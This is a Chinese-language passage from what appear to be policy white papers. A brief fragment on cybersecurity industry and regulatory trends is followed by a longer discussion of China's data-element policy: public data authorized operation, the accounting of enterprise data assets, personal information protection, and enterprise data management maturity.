动态演进、按需安全的新型基础设施安全保障能力。一是随着动态安 全、智能安全、主动安全等技术理论的逐步成熟,具备实战优势且适 应各垂直应用领域的场景化产品将不断加速落地。二是为了降低用户 运维成本、提升安全防御效率,安全能力加速从传统防火墙、WAF 等固化单一形态产品向集成了多种安全能力的一体化解决方案转变。 三是紧耦合、前置性的应用部署方式成为趋势,全向融通的场景化安 全,对安全功能性能、场景表现能力等进行充分的前置模拟验证等, 将成为未来发展的重要方向。 (三)网络安全相关政策监管将再上新台阶 “十四五”时期,我国网络安全相关政策监管将再上新台阶,在 新型融合性网络安全保障体系、关键信息基础设施安全保护、数据安 全风险管控和网络安全产业发展方面有望迎来新的政策加持。其中, 围绕“新型融合性网络安全保障体系”,车联网、工业互联网、5G 等 领域将会有更多针对性政策规范出台;围绕“关键信息基础设施网络 安全”,安全防护能力成熟度评价机制、网络产品安全漏洞管理等方 面将迎来更多切实举措;围绕“数据安全风险管控”,数据分级分类、 重要数据保护、数据跨境流动等方面有望迎来更多配套支持政策;围 绕“ 网络安全产业高质量发展”,国家网络安全产业园区建设、关键 技术和产品攻关示范应用、安全骨干企业培育等方面有望加大政策引 导。
standards
一、数据要素再认识 数据的爆发式增长和规模化应用不断催生新产业、新业态,对生 产力和生产关系的发展和变革具有重要影响。将数据增列为生产要素 意味着对数据要素价值释放提出更高目标,需要通过深度研究、广泛 实践,反复认知和领会数据要素战略布局、时代背景与理论内涵,不 断推进数据要素发展,有力支撑数字中国建设。 (一) 国家战略全方位布局数据要素发展 我国数据要素政策进入体系化构建阶段。 自 2014 年大数据首次 写入政府工作报告以来,在关于数据的系列政策布局推动下,数据与 实体经济融合程度不断加深,数据技术、数据产业、数据应用、数据 安全等方面都取得长足发展。2019 年,十九届四中全会首次将数据 增列为生产要素,关于数据资源整合共享、开发利用、安全治理、市 场化配置等方面的数据要素体系化顶层设计正式启动。四年来,《关 于构建更加完善的数据要素市场化配置体制机制的意见》《“十四五” 数字经济发展规划》《关于构建数据基础制度更好发挥数据要素作用 的意见》《数字中国建设整体布局规划》等文件相继出台,数据要素 政策体系架构初步形成,擘画出数据资源大循环、数据要素价值充分 实现、全体人民共享数字经济发展红利的宏伟蓝图。 “数据二十条”为推动数据要素发展筑牢政策基础。习近平总书 记指出,数据基础制度建设事关国家发展和安全大局,要维护国家数 据安全,保护个人信息和商业秘密,促进数据高效流通使用、赋能实 体经济,统筹推进数据产权、流通交易、收益分配、安全治理,加快 构建数据基础制度体系。2022 年 12 月, “数据二十条”的出台明确 了数据基础制度体系基本架构(如图 1),提出建立保障权益、合规 使用的数据产权制度,建立合规高效、场内外结合的数据要素流通和 交易制度,建立体现效率、促进公平的数据要素收益分配制度,建立 安全可控、弹性包容的数据要素治理制度。以“数据二十条”为指导, 各地各部门将制定数据要素相关细则规定,围绕“数据二十条”不断 丰富完善数据要素各方面制度体系和配套政策,打造“ 1+N ”数据基 础制度体系。 来源: 国家发展和改革委员会 图 1 数据基础制度体系 数字中国建设引领数据要素价值释放方向。建设数字中国是数字 时代推进中国式现代化的重要引擎,是构筑国家竞争新优势的有力支 撑。2023 年 2 月,《数字中国建设整体布局规划》指出,畅通数据 资源大循环是数字中国建设的两大基础之一,要构建国家数据管理体 制机制,健全各级数据统筹管理机构,推动公共数据汇聚利用,释放 商业数据价值潜能。规划提出的“五位一体”总体布局为数据要素价 值释放指引了方向,数字技术与经济、政治、文化、社会、生态文明 建设的深度融合将带动数据要素在各场景发挥独特作用,从而充分激 活数据要素内在价值,全面赋能经济社会发展。 数据要素统筹管理、协调发展的体制机制进一步完善。2022 年 7 月,国务院批准建立由国家发展改革委牵头,中央网信办、工业和信 息化部等 20 个部委组成的数字经济发展部际联席会议制度,强化国 家层面数字经济战略实施的统筹协调。2023 年 3 月,《党和国家机 构改革方案》提出组建国家数据局,负责协调推进数据基础制度建设, 统筹数据资源整合共享和开发利用,统筹推进数字中国、数字经济、 数字社会规划和建设等工作。国家数据局的组建有利于破除“九龙治 水”的数据治理环境,平衡数据要素安全和发展的辩证关系,从而进 一步推动数据要素的开发利用,推进多层次数据要素市场建设,促进 数据要素、数字经济与实体经济的深度融合。 (二) 人工智能发展对数据供给提出更高要求 2023 年, 以 ChatGPT 等为代表的 AIGC 技术应用火遍全球,大 模型技术取得的突破使人工智能技术发生了深刻的变革,而这个突破 离不开高质量数据的发展。可以说,数据已成为未来人工智能竞争的 关键要素,人工智能正在从“以模型为中心”加速向“以数据为中心” 转变。 人工智能发展驱动数据要素市场需求爆发。伴随着大模型时代的 到来,通用人工智能(AGI)产业正迎来爆发期,更加需要大规模、 高质量、多样化的数据集提升模型效果和泛化能力。大模型训练使用 的数据集规模持续增长,例如根据公开资料显示,2018 年 GPT-1 数 据集约 4.6GB,2020 年 GPT-3 数据集达到了 753GB,而 2021 年 Gopher 数据集已达 10550GB ,2023 年 GPT-4 的数据量更是 GPT-3 的数十倍 以上。 当前,主流大模型预训练数据主要来源于公开数据集、合作数据 分享、大规模网络数据以及通过数据众包方式获取的数据。然而,我 国人工智能领域高质量数据集缺乏、数据供给的产业生态不健全、企 业数据资源获取成本高等问题依然严峻。一是国内人工智能领域高质 量数据集缺乏。虽然我国已有部分中文开源数据集,但在数量上远远 少于国际英文公开数据集,在数据质量方面参差不齐、部分内容十分 陈旧。由于高质量数据集的缺乏,部分国产大模型采用“英文数据集 +翻译软件”的方式生成中文语料库,导致训练结果出现巨大的文化 冲突。二是人工智能领域数据供给的产业生态不健全。由于国内数据 要素市场发展尚处于初级阶段,数据流通规则和数据供需对接机制未 有效建立, 目前国内尚未形成高效完整的人工智能数据产品供应链。 三是企业数据资源获取成本高。在模型训练过程中,通常 80%的工作 是数据构建和准备高质量数据,人工智能企业需要花费大量的人力和 物力进行数据集采集、清洗和标注,成本极高。同时,人工智能企业 通常难以获取行业高质量数据集,常陷入 “寻数无门”的困境。 对此,各类主体通过数据要素市场积极应对上述问题。部分地方 和行业推出一系列举措加强高质量数据供给,为大模型成长提供充足 “养料”。例如,2023 年 5 月印发的《深圳市加快推动人工智能高 质量发展高水平应用行动方案(2023 —2024 年)》提出,“建立多模态 公共数据集,打造高质量中文语料数据”。2023 年 8 月,近 50 家单 位成立“开放算料联盟”,围绕高质量中文训练数据和多模态训练数 据,协调数据要素、数据治理、训练数据、数据标注等相关标准制定, 协助数据交易所增加大模型相关的新品类和新专区。 此外,合成数据也成为模型训练中的重要类型,为数据要素市场 带来了新需求。据专家预测,模型训练中必不可少的语言数据将于 2030-2040 年耗尽,其中能训练出更好性能的高质量语言数据将于 2026 年耗尽,而视觉数据恐将于 2030-2060 年耗尽。未来,合成数据 将成为模型训练的关键数据。根据 Gartner 的预测,2024 年用于训练 大模型的数据中有 60%将是合成数据,到 2030 年大模型使用的绝大 部分数据都将由人工智能合成。这是否会对数据要素市场带来结构性 的变化,还有待未来观察。 (三) 数据要素概念聚焦于数据价值释放 数据要素概念的内核是提高生产效率与资源配置效率。生产要素 是对某一时期经济发展中所需重要资源的科学抽象,是对生产过程中 所投入成本的高度凝练。作为一种理论视角下的概念,从外延角度看, 数据要素固然包括根据特定生产需求汇聚、整理、加工而成的计算机 数据及其衍生形态1,但数据要素这一概念不只是对各行业各领域各 类数据的指代,更是对数据所蕴藏巨大价值的强调。数据支撑业务贯 通、推动数智决策、流通对外赋能的三次价值2是挖掘、释放数据要 素价值的主要手段,而激活数据要素的根本目的是将数据以多样、创 新的方式投入于经济社会发展全过程,通过数据开发利用增加生产经 营活动的投入产出比,促进跨领域活动过程中资源的高效流动,从而 全面提高生产效率与资源配置效率。 业界对于数据要素阶段划分有诸多探讨。为推动数据要素价值释 放,可将具体过程进行分解。例如,按照供应链可分解为数据供给、 数据流通、数据应用、数据安全等阶段;按照数据价值增值的阶段性 目标,可分解为数据资源化、数据资产化、数据资本化或产品化等阶 段。每个阶段均可进一步细分,例如,不同意义层次上的数据资产概 念突出了数据要素价值释放的不同需求:在经济意义上,凡能产生价 值的数据资源都可以用数据资产强调,从而提升组织对数据管理、数 据应用的重视程度;在会计意义上,参照我国《企业会计准则——基 本准则》第二十条“资产是指企业过去的交易或者事项形成的、由企 业拥有或者控制的、预期会给企业带来经济利益的资源”定义,数据 资产需具备组织拥有或控制、能够产生经济利益等性质,这对数据的 确权、流通提出了要求;而在资产负债表列报意义上,参照我国《企 业会计准则——基本准则》第二十二条“符合资产定义和资产确认条 件的项目,应当列入资产负债表;符合资产定义、但不符合资产确认 1 《数据要素白皮书(2022 年)》 2 《数据要素白皮书(2022 年)》 条件的项目,不应当列入资产负债表”要求,数据资产若要入表,还 应满足 “有关经济利益很可能流入企业”“成本或价值能可靠计量” 两大资产确认条件。总之,类似的分解有利于数据要素政策、目标等 落地,各阶段的活动职能成为实现数据生产要素价值的必要环节。 二、资源:分类推进数据要素探索已成为共识 数据资源是释放数据要素价值的“原材料”。随着数字经济的迅 猛发展,各类主体在生产、经营、管理、服务、消费等过程中产生大 量数据。在推进数据开发利用、释放数据价值过程中,不同类型数据 面临不同的重点任务与关键问题,分类推进数据要素探索已成为当前 共识。 (一) 不同类别数据资源面临不同关键问题 数据分类存在多种维度和多种方法,适用于不同场景。按照数据 资源存储的维度,可分为基础层数据、中间层数据、应用层数据等, 不同层次对数据的集成性、灵活性等要求不同。按照对数据资源加工 程度的维度,可分为原始数据、衍生数据、数据产品等,数据加工者 在其中的劳动和贡献存在差异。按照数据安全的维度,可分为一般数 据、重要数据、核心数据等,通过数据分类分级降低数据安全风险。 数据分类的维度和方法多种多样,反映出数据在存储、加工、应用、 安全等过程和场景中的复杂性。 国外主要根据公共利益或个人权利划分数据类型。例如,美国《开 放政府数据法案》等按照数据持有者类型的不同,将数据分为公共数 据、非公共数据两类,以区分数据是否具备公共属性及相应的流通导 向与策略。美国《开放政府数据法案》确立公共数据可以被所有人公 开使用、非公共数据需通过许可协议获得使用的原则,规定美国的所 有政府部门都要向公众开放非敏感类的政府数据,从而加强公众、企 业或其他组织对政府公开数据的利用。欧盟《通用数据保护条例》 (GDPR)按照数据所描述对象的不同,将数据分为个人数据、非个 人数据两类,凸显出因数据来源主体实际掌控数据能力不同,需采取 差异化的数据相关权利措施。GDPR 在个人数据方面赋予用户知情权、 被遗忘权、携带权等权利。针对非个人数据,欧盟制定《非个人数据 在欧盟境内自由流动的框架》《数据法案》等推进非个人数据的自由 流动与跨境传输。 来源: 中国信息通信研究院 图 2 公共数据、企业数据、个人数据的复杂关系 我国“数据二十条”在总述探索数据产权结构性分置制度时,提 出“建立公共数据、企业数据、个人数据的分类分级确权授权制度”, 按照数据相关权益归属的不同,将数据分为公共数据、企业数据、个 人数据三大类型,突出不同类型的重点关切,探寻相应的突破方向。 从数据实际生成与持有角度看,三种类型的划分尽管存在复杂交叉 (如图 2),但有利于根据不同类型数据的特性建立细化的分类标准 与流通使用规范,也有助于建立不同主体的权责利动态调整机制,促 进相关探索向 “深水区”推进。 公共数据的概念与范围仍处于不断讨论和迭代中。“数据二十条” 总体描述了公共数据是在各级党政机关、企事业单位依法履职或提供 公共服务过程中产生的数据,但并未明确划定公共数据的范围和边界。 当前,来自政务体系的数据(部分文件中称“政务数据”)和来自公 共事业的数据(包括科研、教育、文化、供水、供电、公交等公共事 业)由于受公共财政支持或在履行公共管理或服务职能中产生,归属 于公共数据基本不存在争议。但是,另有一类数据是企业在经营公共 服务性质业务时收集、产生的关乎公共利益的数据,其是否属于公共 数据仍存争议。在企业经营的复杂过程中,数据是否因提供公共服务 而产生不易区分,讨论该类数据时务须审慎判断企业所持有数据与公 共服务、公共利益的关系。逐步厘清公共数据的范围,有针对性地引 导和促进公共数据开发利用,对提升公共治理与服务水平、发展壮大 数字经济具有重要意义。对于来自政务体系的数据和来自公共事业的 数据,一般认为,其归国家或全民所有,管理、开放等职责由政府或 其他公共部门代为行使。本着“取之于民、用之于民、造福于民”的 原则,在保障国家安全、商业秘密安全、个人信息安全的前提下,按 用途加大供给使用范围将使公共数据价值更好回馈全社会。因此,如 何加大供给规模、推动供给提质增效成为公共数据发展的关键问题。 企业数据来源广泛,有丰富的生成方式。由于企业的生产、经营、 管理链条较长,企业的数据需求多元复杂,对数据需要进行不同形式 和程度的加工、整理与分析,这一过程中形成的多种衍生数据也丰富 了企业数据的表现形式。按照企业数据生成方式的不同,可将企业数 据划分为三种主要类型:一是企业自行采集、记录客观现象所得到的 数据;二是企业在生产经营活动中,采集与用户的交互记录所得到的 数据;三是企业基于已产生的数据,在赋予数据全新价值过程中所得 到的数据。在不同类型企业数据的生成过程中,企业尽管付出的资源 和劳动有所不同,但为数据赋予了独特的业务价值,需要得到有效地 评估与认定。因此,如何认定企业数据的业务贡献,促进数据价值“显 性化”成为企业数据的关键问题。 个人数据大多由公共部门和企业实际持有。对于描述或标识特定 自然人信息的数据,如自然人的姓名、身份证号码等,其承载的信息 具有一定的客观性,即这类信息不依赖于数据持有者所搭建的业务系 统或应用软件,但数据持有者掌握这类信息后,有可能出现隐私泄露、 滥用等风险。对于自然人与数据持有者交互产生的描述行为痕迹信息 的数据,其所承载的信息对人来说可读性较弱,一般依赖于数据持有 者设计或搭建的表格、系统和软件。数据持有者汇集大量个人痕迹数 据后,经数据挖掘与分析可将数据价值不断放大,但也可能出现“大 数据杀熟”等风险。此外,自然人创作的各类信息也形成了大量数据。 个人创作的作品一般用于其他目的,而随着数据挖掘的深入,尤其是 人工智能大模型的迅猛发展,个人作品被数据持有者收集汇聚,成为 特定场景中独具价值的数据。但这一过程中,个人相关权益可能被侵 犯。总体来看,由于个人对不同类型个人数据的掌控能力均有限,保 障个人的隐私、人类道德伦理乃至人的主体性等已成为大众关注的焦 点,如何在加强相关个人权益保护的基础上开发利用仍是个人数据的 关键问题。 (二) 授权运营促进公共数据供给提质增效 各地各部门积极开展公共数据开放实践。近年来,各地方政府、 部分行业主管部门以建立公共数据开放平台为抓手,积极推进公共数 据开放,逐步完善公共数据开发利用体系。截至 2022 年 10 月,我国 已上线 208 个省市公共数据开放平台3。基于开放平台,各级政府开 放大量公共数据集,覆盖市监、工商、交通、生态、公共设施等多个 领域,并且多个地区建立了开放数据需求反馈机制,以便满足社会对 公共数据的应用需求。此外,行业主管部门也通过建设平台开放高质 量数据。例如, 中国气象局通过中国气象数据网开放气象数据,在 2023 年 2 月、7 月先后发布两批《基本气象数据开放共享目录》,共 包含 106 项气象数据产品,在天气预报、农业指导、物流运输等场景 发挥着极为重要的作用。 由于责任与激励机制缺乏,公共数据高质量供给受到制约。总体 而言,我国公共数据仍然存在供给质量不佳、开发利用程度有限等问 题。当前公共数据分布较为分散,同主题公共数据汇聚整理不便。公 3 数据来源:复旦大学数字与移动治理实验室. ,中国地方政府数据开放报告——省域(2022 年度) 共数据开放范围仍然不足,且开放平台数据更新频率整体较低。各地 组织公共数据创新利用活动持续性不强,有效成果数量有限。主要原 因在于,公共部门履职以“三定”职责作为核心依据,大部分公共部 门承担数据安全责任,但对公共数据进行治理和开放的职责则不明确, 推动公共数据开发利用的激励机制不完善。因此,公共数据开放对于 公共部门来说没有明确的动力,特别是对于从事非信息化领域的部门 来说,也往往不具备足够的能力。以上原因导致仍有大量高价值公共 数据 “深藏闺中”,高质量供给受到制约。 各地、各行业开始探索公共数据授权运营,引入社会化力量进行 开发利用,促进公共数据供给提质增效。当前,授权运营在公共数据 领域的实践探索中具有关键意义,可以充分发挥社会力量,解决公共 数据开发利用中开放质量不佳、供需匹配不足、应用挖掘不够等问题, 是大量高价值、高敏感的公共数据开发利用的核心路径。国内各地区、 各行业积极开展授权运营实践。各个先进地区纷纷落实试点举措,在 机制、平台等方面均取得成效。 在机制探索方面,各地方推进探索各具特色的授权运营机制,以 释放公共数据价值为核心,逐步形成了几类不同的发展模式。一是集 中 1 对 1 模式,以浙江、安徽、贵州、成都、青岛等地为代表。地方 政府集中统一授权某一机构承担该区域平台建设、数据运营、产业培 育等公共数据运营相关工作。一方面,集中授权具有权威性,有利于 通过地域数据整合实现价值最大化;另一方面,集中授权存在市场效 率不够高的问题,单一运营主体响应市场需求变化的速度可能有限。 二是分行业的 1 对 N 模式,以北京市的金融公共数据专区为代表(如 图 3)。地方政府授权不同的行业属性机构,按照行业特点开展公共 数据运营工作,专业性更强,有利于充分发挥行业属性作用,但统筹 协调的难度也随之增大。2023 年 7 月,《北京市公共数据专区授权 运营管理办法(征求意见稿)》发布,在金融场景的实践基础上推进 专区制度体系建设,并深化交通、位置、空间、信用等各专区建设和 应用。三是分散的 1 对 N 模式, 以广东、上海、武汉等地为代表。 地方政府根据不同数据与不同机构特点进行匹配,授权各类型市场主 体分别开展公共数据运营工作。分散授权的灵活性更好,有利于发挥 市场主体主观能动性作用,但一定程度上也容易出现混乱,对监管的 要求更高。同时,由于地域数据未能完全整合,数据可发挥的价值有 限。 来源: 中国信息通信研究院 图 3 北京公共数据专区运营模式 在平台运营方面,部分地方通过建立统一的地域性公共数据运营 平台探索公共数据产品或服务的应用与流通。一类是公共数据运营服 务平台,例如贵州省的云上贵州平台,在明确授权统一平台对全省公 共数据进行汇集、存储、共享、开放的基础上,依托全省资源打造数 据产品及服务体系,与贵阳大数据交易所协同推动构建贵州大数据产 业生态。成都市政府授权成都数据集团搭建公共数据运营服务平台, 已于 2020 年上线。平台直接接入公共数据并作为供需对接桥梁,基 于应用需求,经协调获取相应数源部门授权后,与应用方共同打造数 据产品并接受数据使用监督。另一类是兼具公共数据加工与数据交易 的综合服务平台,例如海南省的“数据产品超市”,以授权运营的思 路搭建集数据归集、管理、加工、交易为一体的公共数据平台,将各 类型参与主体纳入平台,由应用主体对公共数据进行加工增值后以数 据产品的形式开放给市场。 此外,众多行业主管部门的公共数据也得到有效开发利用,通过 授权运营的模式引入社会化力量推进数据价值的充分释放。相较于地 方的公共数据,行业主管部门持有和控制的公共数据是纵向的数据归 口,在行业领域内具有相对完整性和全面性,推进行业主管部门公共 数据的应用与流通也是公共数据授权运营的关键工作之一。例如,司 法数据作为来自各级司法体系履职和提供服务过程的公共数据,包含 法条、立案、审判、裁判文书等多方面的司法相关数据,具有非常独 特的应用价值。当前,司法数据由最高人民法院信息中心下属中国司 法大数据研究院统一推进开发利用,应用主要集中在为政府及公共部 门提供决策支撑、为金融领域产品提供服务依据、为企业或个人主体 提供司法大数据服务等场景。此外,人力资源和社会保障部将社保数 据授权金保信社保卡科技有限公司运营,人民日报社将人民日报历史 数据授权人民网科技(北京)有限公司运营,中国气象局将气象数据 授权北京天译科技有限公司等相关机构运营,这些均是行业公共数据 授权运营的典型案例。 (三) 会计入表推动企业数据价值“显性化 ” 近年来,虽然“将企业数据资源视为资产进行管理”逐渐成为众 多企业的共识,但这里的“资产”往往只是经济意义上的资产,体现 了企业数字化过程中数据资源的重要性。而对于数据能否真正成为会 计意义上的资产、能否计入企业资产负债表,始终是各界讨论的焦点。 今年 8 月 21 日,财政部正式发布《企业数据资源相关会计处理暂行 规定》(以下简称《暂行规定》) ,并规定自 2024 年 1 月 1 日起施 行。《暂行规定》的出台肯定了数据资源可具有资产属性,是数据要 素市场发展的重要里程碑。作为报表意义上的“资产”,企业数据的 市场价值与业务贡献将在财务报表中得以 “显性化”。 《暂行规定》明确了企业数据资源在财务报表中进行会计确认和 计量的思路。出台《暂行规定》的主要目的是,为消除相关企业实务 中对“数据资源能否作为会计上的资产确认”“作为哪类资产‘入表’” 等疑虑提供指引。因此,《暂行规定》在不改变现行企业会计准则的 基础上,给出了将数据确认为无形资产、确认为存货和不确认资产三 条入表思路。具体来说,《暂行规定》规定:企业使用的数据资源, 符合《企业会计准则第 6 号——无形资产》(财会〔2006〕3 号)规 定的定义和确认条件的,应当确认为无形资产;企业日常活动中持有、 最终目的用于出售的数据资源,符合《企业会计准则第 1 号——存货》 (财会〔2006〕3 号)规定的定义和确认条件的,应当确认为存货; 企业出售未确认为资产的数据资源,应当按照收入准则等规定确认相 关收入。 企业数据资源“入表”有利于内外部发现并确认企业数据的价值。 在将数据确认为无形资产或存货进行会计计量的过程中,企业需要明 确取得和持有数据资源过程中产生的各项成本或增减值,企业数据的 产生成本或应用价值将得到更加完整、准确的列示,基于企业数据资 产产生的收入进一步明确。继而,对于从事数据产品(或数据服务) 供应的企业来说,有助于企业确定更为市场所认可的数据产品定价, 促进企业参与市场化的数据交易流通;对于数据密集型企业来说,有 助于投资者更好发现和理解企业整体的价值,提升企业的融资机会, 扩大企业的发展空间。同时,针对企业如何贯彻实施《暂行规定》, 财政部会计司表示,企业应当主动按照相关披露要求,持续加强对数 据资源的应用场景或业务模式、原始数据类型来源、加工维护和安全 保护情况、涉及的重大交易事项、相关权利失效和受限等相关信息的 自愿披露,以全面地反映数据资源对企业财务状况、经营成果等的影 响。因此,在实施“入表”的过程中,通过对数据资源相关情况的盘 点和披露,企业将更加了解、重视和明确数据资源的分布、特点和应 用价值,有利于企业进一步挖掘数据应用,释放数据要素价值。 需要注意到的是,《暂行规定》还不是真正意义上的“数据资产 会计准则”。《暂行规定》目前只给出了“满足资产确认条件且价值 确定的数据资源如何计入报表”的解决思路,但是没有解决“数据价 值如何确定”的问题。由于数据具有未来经济利益难确定、经济寿命 不确定、价值易变性等区别于传统要素的特性,成本法、收益法、市 场法等估值方法均有其局限性。一些企业探索综合三种方法,基于收 益法建立数据资产估值体系,通过评价数据资产业务经济贡献值指导 形成数据资产价值基准。例如,浦发银行提出的数据资产价值评估框 架,围绕数据资产潜能预测、效能评估和收益测算,将数据资产价值 分为内在价值、成本价值、业务价值、经济价值以及市场价值五类, 并给出了每类价值的价值因子及计算公式。2023 年 9 月,中国资产 评估协会印发《数据资产评估指导意见》,对资产评估机构按照成本 法、收益法和市场法开展数据资产评估提供了进一步指导。然而,企 业数据估值问题是个复杂的难题,当前全社会仍未完全取得共识,还 需要企业、专业研究机构、资产评估机构、会计和审计事务所等进一 步探讨。 总的来看,《暂行规定》的出台迈出了我国为发展数据要素而建 立相关会计核算制度的第一步。《暂行规定》是在现行企业会计准则 体系下的细化规范,在会计确认计量方面与现行无形资产、存货、收 入等相关准则是一致的,不属于国家统一的会计制度要求变更型会计 政策。现阶段,《暂行规定》只是将既有的会计处理规则迁移到“符 合相应条件的数据资产”上,而并非从数据资产的特点出发来设计针 对性的会计规则,也就是说,数据资产暂时将按照与传统资产同样的 方法进行会计计量。从形式上看,只是在企业资产负债表的 “存货” “无形资产”和“开发支出”三个报表项目下分别设置了“数据资源” 子项目;对应的企业核算时将会在相应总账会计科目下面设置“数据 资源”二级科目。但是,只按照这样的会计方式,数据要素区别于传 统要素的特殊性或将无法从报表中得到充分体现,无法被适应。“数 据入表”目前还只是一个试点的过程,真正建立适应数字经济发展需 求、符合数据要素特殊属性的会计核算方法,未来仍将有很多复杂、 挑战性的工作有待完成。下一步,如何与国际会计准则相协调,如何 建立相适应的审计制度,如何厘清企业数据资产与信息资产的划分, 企业是否会通过数据资产实现增值,银行是否会普遍接受数据资产作 为质押等,这些问题仍然需要时间的检验。 (四) 权益保护仍是个人数据开发利用主线 个人数据方面,《个人信息保护法》针对个人信息数据确立了保 护原则。《个人信息保护法》是中国首部规范个人信息处理活动的专 门立法,旨在保障公民个人信息安全,遏制个人信息泄露、滥用等现 象的发生。该法规定了个人信息处理全过程中应遵循的原则和要求, 明确了相关主体的权利和义务,健全了个人信息保护工作的体制机制。 该法既通过个人信息处理规则、敏感个人信息处理规则、个人信息对 外提供规则、单独同意规则等保障个人权益,又通过匿名化处理、个 人信息处理者不需取得个人同意可以处理个人信息的若干场景等方 面的规定保证个人信息数据可得到合理的开发利用。国际横向比较看, 我国《个人信息保护法》在规则严厉程度上基本对标欧盟 GDPR ,两 部法律文本均赋予个人全面、细致的权利,均对信息处理者施加了较 高的合规义务。同时,我国关于个人信息违法犯罪相关罪名适用主体 广泛,入罪门槛较低。因此,我国已建立起较为严格的个人信息数据 保护原则。 个人对个人数据掌控能力有限,权益保护落地实践未达预期。由 于个人数据主要由公共部门和企业实际掌控,个人数据相关的权利在 具体场景和问题中又较为复杂,因而世界各国在操作层面都还未能完 全适配个人信息、个人数据保护的法律要求,个人信息泄露时有发生、 个人数据越权滥用仍然存在。例如,国外许多网民发现自己在网上分 享的照片成为 Flickr 数据集的素材,自己此前既不知情,又很难将自 己创作的照片数据从数据集中删除。2020 年 7 月以来,工业和信息 化部开展纵深推进 APP 侵害用户权益专项整治行动。截至 2023 年 7 月,工信部已发布关于侵害用户权益行为的 APP(SDK)通报 30 批。 通报并责令整改的 APP 、SDK 中,违规收集个人信息、强制频繁过 度索取权限、违规使用个人信息等问题仍然突出。 通过分级授权细化个人数据采集使用规范已有理论探索。个人数 据开发利用所需的数据多样、场景多变,个人理应可以根据场景和需 求,分级、分步骤进行个人数据的授权,也可以按照意愿撤回相应级 别、步骤的授权。个人数据处理者则应严格遵守个人对数据开发利用 场景、范围等要求,保护个人数据权益。在《个人信息保护法》施行 前,大量收集、处理个人数据的过程属于“一揽子授权”,个人在使 用服务过程中可能需要让渡许多与服务无关的数据。《个人信息保护 法》规定了数据收集与处理的最小必要原则和单独同意原则,支付宝、 微信、美团等平台逐步增加了新业务首次使用单独授权同意、广告权 限管理、个性化推荐权限管理、第三方授权管理、清除历史行为等功 能,实现了初步的个人数据分级、分步骤授权模式。 “数据二十条” 再次强调数据处理者应按照个人授权范围依法依规采集、持有、托管 和使用数据,不得采取“一揽子授权”、强制同意等方式过度收集个 人信息。学界和业界正在探索更加细化、完备的数据要素分级授权体 系(如图 4),以更简洁清晰的方式划分数据开发利用场景,用户既 可以选择授权必要数据来使用基础服务,又可以授权更多数据享受改 进服务乃至支撑数据流通,从而以较低成本实现个人对数据处理范围 的控制。 来源:《数据要素论》 图 4 数据要素分级授权体系示例 通过专业数据托管服务机构降低个人数据行权门槛已有国际实 践。“数据二十条”提出探索由受托者代表个人利益,监督市场主体 对个人信息数据进行采集、加工、使用的机制。个人数据管理机构作 为受托人,可以根据用户的授权委托,代理大量用户进行个人数据集 中存储与管理应用,在遵循相关法规和用户意愿、保护数据隐私和安 全的基础上,以忠诚义务和专业水平帮助个人行使个人数据权利。通 过受托人提供的平台,个人可以集中化管理自己的数据,自主决定每 个机构、平台对自己数据的收集、使用和共享情况,自行携带、转移 自己的数据。因此,个人数据统一托管可向个人赋予更多控制权,有 效降低个人行权门槛。个人数据委托在国际范围内仍属于探索早期。 韩国 MyData 服务于 2021 年开始落地,MyData 运营商通过开展个人 数据汇总整合工作,向个人提供一站式查询和管理服务,但这种模式 的可持续性仍有待观察。 三、主体:企业政府双向发力推进可持续探索 企业和政府构成推进数据要素发展的核心力量。其中,企业是冲 锋在前的创新主体,政府则主要发挥有序引导和规范发展的作用。在 数据要素市场建设过程中,企业和政府需着力提高自身能力,在扮演 好各自角色的基础上守正创新、双向发力,共同推进数据要素发展的 可持续探索。 (一) 企业侧:数据管理与应用能力是前提 企业作为数据要素的创新主体,在丰富的生产经营活动中,积累 了大量宝贵数据有待挖掘使用,同时也是数据要素市场的主要需求方。 结合业务发展目标构建数据管理体系、在业务场景中深度应用数据是 企业整体数据能力提升的必要环节,构成企业数据价值释放的基础。 数据管理规范了数据采集、加工、使用过程,是企业丰富数据应用、 参与数据要素流通的前序基础。数据应用将数据真正转化为生产力, 是释放数据要素价值的最后一公里。在不断夯实自身数据能力的基础 上,企业才能进一步探索参与数据要素市场、构建核心竞争力的方式。 企业不断通过 DCMM 贯标评估提升数据管理能力。 自 2020 年 国家标准《数据管理能力成熟度评估模型》(简称 DCMM)贯标评 估工作启动以来,随着全国范围内的持续宣贯,截至目前已有十余个 行业的千余家企业参与到了 DCMM 评估中,显著提升了全社会数据 管理意识,使得贯标企业数据管理能力得到明显增强。以评估贯标为 契机,企业在战略规划、组织架构、技术工具等方面推动开展数据管 理相关工作:在战略规划方面,通过建立全景数据管理工作视图,确 立数据管理中长期目标和管理活动优先级,统筹、协调各层面工作, 明确所需资源投入总量和分配机制,监督、评价和优化企业数据管理 工作的执行。在组织架构方面,企业通过成立专职团队增强数据管理 执行效率,成立统一数据管理归口部门,普遍形成了决策、管理、执 行的数据管理三层架构组织,并设置专门的数据管理管理岗位,建立 了数据部门、技术部门、业务部门协同机制。在技术工具方面,企业 通过构建统一的数据管理技术平台,将各分散的单一功能型技术工具 进行集成,消除数据管理协同难点,提高数据管理效率。例如,中国 联通集团以《中国联通集团数字化转型行动计划(2022-2025 年)》 为战略纲领,明确了数据管理工作的总体目标、发展路径及保障体系, 形成以数字化转型领导小组为领导,数字化转型推进办公室统筹落实 推进,总部数据治理组、省分数据治理组、地市数据治理组纵向联结 协同的数据管理组织架构,依托联通云底座,打造“湖仓一体、批流 融合”的数据中台,实现全域数据统一采集加工,强化数据管理能力。 同时也应看到,DCMM 标准聚焦在数据管理体系的建设,它的贯彻 落实能帮助企业建立数据能力的基座,但无法直接解决企业数据应用 场景不丰富、业务价值赋能不充分的问题。为此,需要在贯彻 DCMM 标准的基础上,结合数据资产价值评估、会计入表、交易流通等实践, 以价值为导向,推动数据资产运营能力建设,建立常态化的数据资产 运营体系,为数据价值持续释放提供坚实保障。 数据研发运营一体化(DataOps)在数据管理的基础上,解决开 发管理“两张皮”的问题,有效提升数据管理与应用的协作效率。随 着数据应用场景日益丰富,数据分析需求快速变化,数据加工链路日 益复杂,数据工程师、数据管理员、报表开发人员、运维工程师等各 类数据管理角色逐渐增多,导致企业数据交付任务难度大大增加。 DataOps 倡导协同式、敏捷式的数据管理,建立清晰通畅的数据管道, 明确数据管理的流转过程及环节,采用先进的数字化技术推动数据管 理自动化,缩短数据项目的周期,提高各数据管理相关人员的数据检 索、获取和应用效率,并持续改进数据质量,降低管理成本,加速数 据价值释放(如图 5)。例如,通过标准设计、模型设计指导数据开 发,前置化数据质量管理,并建立 SLA 开展数据资产运维,实现开 